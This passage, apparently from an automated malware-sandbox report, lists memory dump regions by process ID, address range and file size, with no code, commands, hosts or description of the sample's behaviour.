                                                                                                    Filesize

                                                                                                    572KB

                                                                                                  • memory/2000-90-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                    Filesize

                                                                                                    1.5MB

                                                                                                  • memory/2000-93-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                    Filesize

                                                                                                    100KB

                                                                                                  • memory/2000-98-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                    Filesize

                                                                                                    100KB

                                                                                                  • memory/2000-91-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                    Filesize

                                                                                                    152KB

                                                                                                  • memory/2028-303-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2068-209-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2068-240-0x00000000020F0000-0x00000000020F2000-memory.dmp
                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/2080-213-0x00000000003E0000-0x00000000003E1000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2080-210-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2108-345-0x00000000002B0000-0x00000000002B1000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2108-324-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2116-212-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2116-216-0x00000000001D0000-0x00000000001D1000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2116-218-0x0000000000540000-0x0000000000541000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2116-220-0x00000000043D0000-0x00000000043D1000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2164-313-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2164-317-0x0000000004A20000-0x0000000004A21000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2252-219-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2292-339-0x0000000000310000-0x0000000000311000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2292-298-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2300-222-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2312-224-0x000000013F410000-0x000000013F411000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2312-223-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2312-301-0x000000001AD20000-0x000000001AD22000-memory.dmp
                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/2348-235-0x000000001ACC0000-0x000000001ACC2000-memory.dmp
                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/2348-229-0x00000000012A0000-0x00000000012A1000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2348-233-0x0000000000450000-0x0000000000451000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2348-225-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2364-275-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2364-282-0x0000000004C30000-0x0000000004C31000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2384-234-0x000000001B070000-0x000000001B072000-memory.dmp
                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/2384-228-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2384-230-0x0000000000020000-0x0000000000021000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2444-386-0x000000001B580000-0x000000001B582000-memory.dmp
                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/2448-237-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2448-253-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                    Filesize

                                                                                                    352KB

                                                                                                  • memory/2448-252-0x0000000000270000-0x000000000029F000-memory.dmp
                                                                                                    Filesize

                                                                                                    188KB

                                                                                                  • memory/2468-319-0x000000000041C5E2-mapping.dmp
                                                                                                  • memory/2468-325-0x0000000004F10000-0x0000000004F11000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2544-242-0x0000000000290000-0x0000000000291000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2544-249-0x0000000004F90000-0x0000000004F91000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2544-236-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2636-261-0x0000000004821000-0x0000000004822000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2636-259-0x0000000004822000-0x0000000004823000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2636-243-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2636-265-0x0000000004824000-0x0000000004826000-memory.dmp
                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/2636-257-0x0000000000230000-0x0000000000290000-memory.dmp
                                                                                                    Filesize

                                                                                                    384KB

                                                                                                  • memory/2636-262-0x0000000001EF0000-0x0000000001F0E000-memory.dmp
                                                                                                    Filesize

                                                                                                    120KB

                                                                                                  • memory/2636-263-0x0000000004823000-0x0000000004824000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2636-254-0x0000000000520000-0x000000000053F000-memory.dmp
                                                                                                    Filesize

                                                                                                    124KB

                                                                                                  • memory/2636-260-0x0000000000400000-0x0000000000460000-memory.dmp
                                                                                                    Filesize

                                                                                                    384KB

                                                                                                  • memory/2676-309-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2700-245-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2700-250-0x000000001AF40000-0x000000001AF42000-memory.dmp
                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/2700-247-0x0000000001250000-0x0000000001251000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2776-284-0x000000000041C5E2-mapping.dmp
                                                                                                  • memory/2776-288-0x0000000004F90000-0x0000000004F91000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2792-295-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2792-326-0x0000000000380000-0x00000000003A4000-memory.dmp
                                                                                                    Filesize

                                                                                                    144KB

                                                                                                  • memory/2812-251-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2812-388-0x000000001AD76000-0x000000001AD95000-memory.dmp
                                                                                                    Filesize

                                                                                                    124KB

                                                                                                  • memory/2812-338-0x000000001AD70000-0x000000001AD72000-memory.dmp
                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/2880-255-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2880-258-0x0000000000E50000-0x0000000000E51000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2880-270-0x0000000004C30000-0x0000000004C31000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2972-264-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3044-267-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3052-297-0x0000000000600000-0x0000000000601000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/3052-290-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3064-269-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3132-328-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3132-349-0x0000000000480000-0x0000000000481000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/3232-333-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3232-344-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                    Filesize

                                                                                                    80KB

                                                                                                  • memory/3236-391-0x0000000000770000-0x000000000088B000-memory.dmp
                                                                                                    Filesize

                                                                                                    1.1MB

                                                                                                  • memory/3324-369-0x0000000004F00000-0x0000000004F01000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/3324-340-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3340-341-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3492-351-0x0000000000270000-0x0000000000271000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/3532-357-0x00000000044A0000-0x00000000044A1000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/3620-358-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                    Filesize

                                                                                                    80KB

                                                                                                  • memory/3728-379-0x0000000004DB0000-0x0000000004DB1000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/3848-364-0x0000000000260000-0x0000000000261000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/3920-377-0x00000000046F4000-0x00000000046F6000-memory.dmp
                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/3920-376-0x00000000046F3000-0x00000000046F4000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/3920-375-0x00000000046F2000-0x00000000046F3000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/3920-374-0x00000000046F1000-0x00000000046F2000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/3920-373-0x0000000000400000-0x0000000000467000-memory.dmp
                                                                                                    Filesize

                                                                                                    412KB

                                                                                                  • memory/3920-372-0x0000000000240000-0x0000000000270000-memory.dmp
                                                                                                    Filesize

                                                                                                    192KB